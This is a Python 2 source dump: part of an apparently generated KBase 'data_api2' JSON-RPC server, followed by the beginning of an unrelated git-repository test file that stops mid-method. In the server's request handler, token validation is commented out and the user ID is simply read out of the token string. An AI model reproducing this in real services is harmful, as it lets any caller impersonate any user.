async_run_methods['data_api2.get_feature_locations_async'] = ['data_api2', 'get_feature_locations']
async_check_methods['data_api2.get_feature_locations_check'] = ['data_api2', 'get_feature_locations']
sync_methods['data_api2.get_feature_locations'] = True
async_run_methods['data_api2.get_feature_publications_async'] = ['data_api2', 'get_feature_publications']
async_check_methods['data_api2.get_feature_publications_check'] = ['data_api2', 'get_feature_publications']
sync_methods['data_api2.get_feature_publications'] = True
async_run_methods['data_api2.get_feature_dna_async'] = ['data_api2', 'get_feature_dna']
async_check_methods['data_api2.get_feature_dna_check'] = ['data_api2', 'get_feature_dna']
sync_methods['data_api2.get_feature_dna'] = True
async_run_methods['data_api2.get_feature_functions_async'] = ['data_api2', 'get_feature_functions']
async_check_methods['data_api2.get_feature_functions_check'] = ['data_api2', 'get_feature_functions']
sync_methods['data_api2.get_feature_functions'] = True
async_run_methods['data_api2.get_feature_aliases_async'] = ['data_api2', 'get_feature_aliases']
async_check_methods['data_api2.get_feature_aliases_check'] = ['data_api2', 'get_feature_aliases']
sync_methods['data_api2.get_feature_aliases'] = True
async_run_methods['data_api2.get_cds_by_gene_async'] = ['data_api2', 'get_cds_by_gene']
async_check_methods['data_api2.get_cds_by_gene_check'] = ['data_api2', 'get_cds_by_gene']
sync_methods['data_api2.get_cds_by_gene'] = True
async_run_methods['data_api2.get_cds_by_mrna_async'] = ['data_api2', 'get_cds_by_mrna']
async_check_methods['data_api2.get_cds_by_mrna_check'] = ['data_api2', 'get_cds_by_mrna']
sync_methods['data_api2.get_cds_by_mrna'] = True
async_run_methods['data_api2.get_gene_by_cds_async'] = ['data_api2', 'get_gene_by_cds']
async_check_methods['data_api2.get_gene_by_cds_check'] = ['data_api2', 'get_gene_by_cds']
sync_methods['data_api2.get_gene_by_cds'] = True
async_run_methods['data_api2.get_gene_by_mrna_async'] = ['data_api2', 'get_gene_by_mrna']
async_check_methods['data_api2.get_gene_by_mrna_check'] = ['data_api2', 'get_gene_by_mrna']
sync_methods['data_api2.get_gene_by_mrna'] = True
async_run_methods['data_api2.get_mrna_by_cds_async'] = ['data_api2', 'get_mrna_by_cds']
async_check_methods['data_api2.get_mrna_by_cds_check'] = ['data_api2', 'get_mrna_by_cds']
sync_methods['data_api2.get_mrna_by_cds'] = True
async_run_methods['data_api2.get_mrna_by_gene_async'] = ['data_api2', 'get_mrna_by_gene']
async_check_methods['data_api2.get_mrna_by_gene_check'] = ['data_api2', 'get_mrna_by_gene']
sync_methods['data_api2.get_mrna_by_gene'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
            raise ValueError('Neither the \'job-service-url\' configuration parameter nor the ' +
                '\'KB_JOB_SERVICE_URL\' environment variable is defined')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
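        # The serialized request body is roughly:
        #   {"method": "KBaseJobService.run_job", "params": [...], "version": "1.1",
        #    "id": "<random digits>", "context": {...}}   (context only when provided)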
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
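# Illustrative usage only ('token' and 'ref' are placeholders, not defined in this file):
#   client = AsyncJobServiceClient(token=token)
#   job_id = client.run_job({'method': 'data_api2.get_taxon', 'params': [ref]})
#   state = client.check_job(job_id)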
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'data_api2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_data_api2.get_taxon,
name='data_api2.get_taxon',
types=[basestring])
self.method_authentication['data_api2.get_taxon'] = 'required'
self.rpc_service.add(impl_data_api2.get_assembly,
name='data_api2.get_assembly',
types=[basestring])
self.method_authentication['data_api2.get_assembly'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_types,
name='data_api2.get_feature_types',
types=[basestring])
self.method_authentication['data_api2.get_feature_types'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_type_descriptions,
name='data_api2.get_feature_type_descriptions',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_type_descriptions'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_type_counts,
name='data_api2.get_feature_type_counts',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_type_counts'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_ids,
name='data_api2.get_feature_ids',
types=[basestring, dict, basestring])
self.method_authentication['data_api2.get_feature_ids'] = 'required'
self.rpc_service.add(impl_data_api2.get_features,
name='data_api2.get_features',
types=[basestring, list])
self.method_authentication['data_api2.get_features'] = 'required'
self.rpc_service.add(impl_data_api2.get_proteins,
name='data_api2.get_proteins',
types=[basestring])
self.method_authentication['data_api2.get_proteins'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_locations,
name='data_api2.get_feature_locations',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_locations'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_publications,
name='data_api2.get_feature_publications',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_publications'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_dna,
name='data_api2.get_feature_dna',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_dna'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_functions,
name='data_api2.get_feature_functions',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_functions'] = 'required'
self.rpc_service.add(impl_data_api2.get_feature_aliases,
name='data_api2.get_feature_aliases',
types=[basestring, list])
self.method_authentication['data_api2.get_feature_aliases'] = 'required'
self.rpc_service.add(impl_data_api2.get_cds_by_gene,
name='data_api2.get_cds_by_gene',
types=[basestring, list])
self.method_authentication['data_api2.get_cds_by_gene'] = 'required'
self.rpc_service.add(impl_data_api2.get_cds_by_mrna,
name='data_api2.get_cds_by_mrna',
types=[basestring, list])
self.method_authentication['data_api2.get_cds_by_mrna'] = 'required'
self.rpc_service.add(impl_data_api2.get_gene_by_cds,
name='data_api2.get_gene_by_cds',
types=[basestring, list])
self.method_authentication['data_api2.get_gene_by_cds'] = 'required'
self.rpc_service.add(impl_data_api2.get_gene_by_mrna,
name='data_api2.get_gene_by_mrna',
types=[basestring, list])
self.method_authentication['data_api2.get_gene_by_mrna'] = 'required'
self.rpc_service.add(impl_data_api2.get_mrna_by_cds,
name='data_api2.get_mrna_by_cds',
types=[basestring, list])
self.method_authentication['data_api2.get_mrna_by_cds'] = 'required'
self.rpc_service.add(impl_data_api2.get_mrna_by_gene,
name='data_api2.get_mrna_by_gene',
types=[basestring, list])
self.method_authentication['data_api2.get_mrna_by_gene'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"data_api2 but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
#user, _, _ = \
# self.auth_client.validate_token(token)
list=token.split('=')
ctx['user_id'] = list[1]
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
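        # Appends the local UTC offset (hh:mm) to datetime.now().isoformat().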
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
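# e.g. (illustrative): python data_api2Server.py --port 9999 --host 0.0.0.0
#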
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, this will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
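# Usage sketch for the two helpers above (the port value is whatever the OS
# assigns when port=0; the requests themselves are illustrative):
#   port = start_server(host='localhost', port=0, newprocess=True)
#   # ... issue JSON-RPC POST requests to http://localhost:<port>/ ...
#   stop_server()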
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
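# Minimal sketch of an input file for process_async_cli, based on the fields
# read above ('method' is 'Module.method'; 'id'/'version'/'context' are
# optional; the params shape depends on the target method):
#   {"method": "MyModule.my_method", "params": [{"arg": 1}], "id": "1"}
# Invoked via the __main__ block below as:
#   python <this_file> input.json output.json [token_or_token_file]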
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_git_repo.py
|
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import sys
import os.path as path
import multiprocessing
from bes.testing.unit_test import unit_test
from bes.fs.file_util import file_util
from bes.fs.temp_file import temp_file
from bes.system.env_override import env_override_temp_home_func
from bes.system.execute import execute
from bes.git.git import git
from bes.git.git_repo import git_repo
from bes.git.git_status import git_status
from bes.git.git_temp_repo import git_temp_repo
from bes.git.git_unit_test import git_temp_home_func
class test_git_repo(unit_test):
def _make_repo(self, remote = True, content = None, prefix = None, commit_message = None):
return git_temp_repo(remote = remote, content = content, prefix = prefix,
debug = self.DEBUG, commit_message = commit_message)
@git_temp_home_func()
def test_init(self):
r = self._make_repo(remote = False)
self.assertEqual( [], r.status('.') )
@git_temp_home_func()
def test_exists_false(self):
tmp_dir = temp_file.make_temp_dir()
r = git_repo(tmp_dir)
self.assertFalse( r.exists() )
@git_temp_home_func()
def test_exists_true(self):
r = self._make_repo(remote = False)
self.assertTrue( r.exists() )
@git_temp_home_func()
def test_add(self):
r = self._make_repo(remote = False)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
self.assertEqual( [
git_status(git_status.ADDED, 'a/b/c/foo.txt'),
git_status(git_status.ADDED, 'd/e/bar.txt'),
], r.status('.') )
@git_temp_home_func()
def test_commit(self):
r = self._make_repo(remote = False)
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
self.assertEqual( [
git_status(git_status.ADDED, 'a/b/c/foo.txt'),
git_status(git_status.ADDED, 'd/e/bar.txt'),
], r.status('.') )
r.commit('foo', '.')
self.assertEqual( [], r.status('.') )
@git_temp_home_func()
def test_pull(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
git.clone(r1.root, tmp_dir)
r2 = git_repo(tmp_dir)
self.assertEqual( [], r2.status('.') )
r1.write_temp_content([ 'file new/stuff.txt "some stuff" 644' ])
r1.add('new/stuff.txt')
r1.commit('foo', 'new/stuff.txt')
new_stuff_path = path.join(r2.root, 'new/stuff.txt')
self.assertFalse( path.exists(new_stuff_path) )
r2.pull()
self.assertTrue( path.exists(new_stuff_path) )
@git_temp_home_func()
def test_pull2(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
r2 = git_repo(tmp_dir, address = r1.root)
r2.clone()
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt') ], r2.find_all_files() )
r1.write_temp_content([
'file kiwi.txt "kiwi" 644',
])
r1.add('kiwi.txt')
r1.commit('foo', 'kiwi.txt')
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt'), 'kiwi.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_clone_or_pull(self):
r1 = self._make_repo(remote = False)
r1.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r1.add('.')
r1.commit('foo', '.')
tmp_dir = temp_file.make_temp_dir()
r2 = git_repo(tmp_dir, address = r1.root)
r2.clone_or_pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt')], r2.find_all_files() )
r1.write_temp_content([
'file kiwi.txt "kiwi" 644',
])
r1.add('kiwi.txt')
r1.commit('foo', 'kiwi.txt')
r2.pull()
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt'), 'kiwi.txt' ], r2.find_all_files() )
@git_temp_home_func()
def test_find_all_files(self):
r = self._make_repo(remote = False)
self.assertEqual([], r.find_all_files() )
r.write_temp_content([
'file a/b/c/foo.txt "foo content" 755',
'file d/e/bar.txt "bar content" 644',
'dir baz "" 700',
])
r.add('.')
r.commit('foo', '.')
self.assertEqual([ self.xp_path('a/b/c/foo.txt'), self.xp_path('d/e/bar.txt')], r.find_all_files() )
@git_temp_home_func()
def test_push(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r2.read_file('foo.txt', codec = 'utf8') )
@git_temp_home_func()
def test_delete_remote_tags(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
r1.tag('1.0.1')
r1.push_tag('1.0.1')
self.assertEqual( [ '1.0.0', '1.0.1' ], r2.list_remote_tags() )
r1.delete_local_tag('1.0.1')
r1.delete_remote_tag('1.0.1')
self.assertEqual( [ '1.0.0' ], r2.list_remote_tags() )
@git_temp_home_func()
def test_list_remote_tags(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
r1.tag('1.0.1')
r1.push_tag('1.0.1')
self.assertEqual( [ '1.0.0', '1.0.1' ], r2.list_remote_tags() )
@git_temp_home_func()
def test_bump_tag(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0.0')
r1.push_tag('1.0.0')
self.assertEqual( '1.0.0', r1.greatest_local_tag() )
r1.bump_tag('revision', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.0.1', r2.greatest_local_tag() )
@git_temp_home_func()
def test_bump_tag_empty(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
self.assertEqual( None, r1.greatest_local_tag() )
r1.bump_tag('revision', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.0.0', r2.greatest_local_tag() )
@git_temp_home_func()
def test_bump_two_components(self):
r1 = self._make_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
r1.tag('1.0')
r1.push_tag('1.0')
self.assertEqual( '1.0', r1.greatest_local_tag() )
r1.bump_tag('minor', reset_lower = True)
r2 = r1.make_temp_cloned_repo()
self.assertEqual( '1.1', r2.greatest_local_tag() )
@git_temp_home_func()
def test_list_local_tags_by_version(self):
r = self._make_repo(remote = False)
r.add_file('readme.txt', 'readme is good')
r.tag('1.0.0')
r.tag('1.0.1')
r.tag('1.0.4')
r.tag('1.0.5')
r.tag('1.0.9')
r.tag('1.0.11')
self.assertEqual( [ '1.0.9', '1.0.11' ], r.list_local_tags_gt('1.0.5') )
self.assertEqual( [ '1.0.5', '1.0.9', '1.0.11' ], r.list_local_tags_ge('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4' ], r.list_local_tags_lt('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4', '1.0.5' ], r.list_local_tags_le('1.0.5') )
@git_temp_home_func()
def test_list_remote_tags_by_version(self):
r1 = self._make_repo()
r2 = r1.make_temp_cloned_repo()
r1.add_file('readme.txt', 'readme is good')
r1.push('origin', 'master')
all_tags = [ '1.0.0', '1.0.1','1.0.4','1.0.5','1.0.9','1.0.11' ]
for tag in all_tags:
r1.tag(tag)
r1.push_tag(tag)
self.assertEqual( all_tags, r2.list_remote_tags() )
self.assertEqual( [ '1.0.9', '1.0.11' ], r2.list_remote_tags_gt('1.0.5') )
self.assertEqual( [ '1.0.5', '1.0.9', '1.0.11' ], r2.list_remote_tags_ge('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4' ], r2.list_remote_tags_lt('1.0.5') )
self.assertEqual( [ '1.0.0', '1.0.1', '1.0.4', '1.0.5' ], r2.list_remote_tags_le('1.0.5') )
@git_temp_home_func()
def test_save_file_first_time(self):
r1 = self._make_repo()
